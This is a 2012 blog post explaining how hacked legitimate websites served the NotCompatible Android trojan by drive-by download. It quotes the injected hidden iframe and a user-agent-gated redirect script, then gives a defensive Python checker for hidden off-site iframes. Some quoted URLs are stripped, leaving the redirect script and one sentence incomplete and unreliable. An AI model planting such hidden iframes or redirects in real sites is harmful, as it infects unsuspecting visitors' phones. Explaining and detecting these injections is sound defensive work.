Friday 18 May 2012

Just when you thought it was safe to web surf on your Android device…

It might be safe to say that April 2012 will go down in history as the month we realized Macs are not virus-proof. If that’s the case, then May 2012 will go down as the month we realized smartphones aren’t safe either.

For the first time, experts have located legitimate sites that have been hacked and infected with Android drive-by-download malware.

“Drive-by-download” malware is harmful software that is automatically downloaded when a particular website is visited. In this case, the malware, a Trojan called NotCompatible, specifically infects Android devices. The significant part of this story is that the malware was found on legitimate websites that had been hacked and infected.

Hacked websites commonly have the following code inserted into the bottom of each page:

<iframe style="visibility: hidden; display: none; display: none;" src="hxxp://{1234567890-0000-DEAD-BEEF-133713371337}"></iframe>

When a PC-based web browser accesses the site in question, it returns a “not found” error. When a browser with the word “Android” in its user-agent header accesses the site, however, the following is returned:

<html><head></head><body><script type="text/javascript"> = "hxxp://";</script></body></html>

As a result, the browser immediately attempts to access the page at Like the previous site, only browsers with the word “Android” in their user-agent string will trigger a download; all other browsers will show a blank page. Since the server returns an Android app, the Android browser automatically downloads it. [ZDNet]
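For site owners, the hidden iframe described above is something you can look for in your own pages. The following is an added example, not code from ZDNet or the original report: it flags iframes that are hidden by inline style or zero size and load from a host other than your own. The host names and the sample page are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

HIDING_STYLES = ("display:none", "visibility:hidden")

class HiddenIframeFinder(HTMLParser):
    """Collects iframes that are invisible to visitors and load off-site content."""

    def __init__(self, site_host):
        super().__init__()
        self.site_host = site_host.lower()
        self.findings = []  # (line number, iframe host)

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = {k: (v or "") for k, v in attrs}
        style = a.get("style", "").lower().replace(" ", "")
        hidden = (any(s in style for s in HIDING_STYLES)
                  or a.get("width") == "0" or a.get("height") == "0")
        src = a.get("src", "").strip()
        if src.lower().startswith("hxxp"):  # accept defanged URLs from reports
            src = "http" + src[4:]
        host = (urlparse(src).hostname or "").lower()
        # Relative URLs have no host and count as same-site.
        offsite = (bool(host) and host != self.site_host
                   and not host.endswith("." + self.site_host))
        if hidden and offsite:
            self.findings.append((self.getpos()[0], host))

def find_hidden_offsite_iframes(html, site_host):
    """Return [(line, host)] for every hidden iframe that points off-site."""
    finder = HiddenIframeFinder(site_host)
    finder.feed(html)
    finder.close()
    return finder.findings

# Constructed sample page: one visible iframe, one hidden same-site iframe,
# and one hidden off-site iframe in the style of the injected code above.
SAMPLE_PAGE = """<html><body>
<p>Welcome to our shop.</p>
<iframe src="/widgets/map.html" width="300" height="200"></iframe>
<iframe style="display: none" src="https://static.shop.example/t.html"></iframe>
<iframe style="visibility: hidden; display: none; display: none;" src="hxxp://injected.invalid/"></iframe>
</body></html>"""

if __name__ == "__main__":
    for line, host in find_hidden_offsite_iframes(SAMPLE_PAGE, "shop.example"):
        print(f"line {line}: hidden iframe loads from {host}")
```

A hit is a reason to compare the page against a known-good copy, since some legitimate widgets also use hidden iframes.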

Up until now, the Android drive-by-download malware had been found only on websites set up by malware distributors specifically to host the program. The fact that the software is now found on legitimate websites opens the door for large-scale infections.

At present, the malware has no known negative effects, but experts believe the current infections are part of a trial run to test the viability of mass distribution.
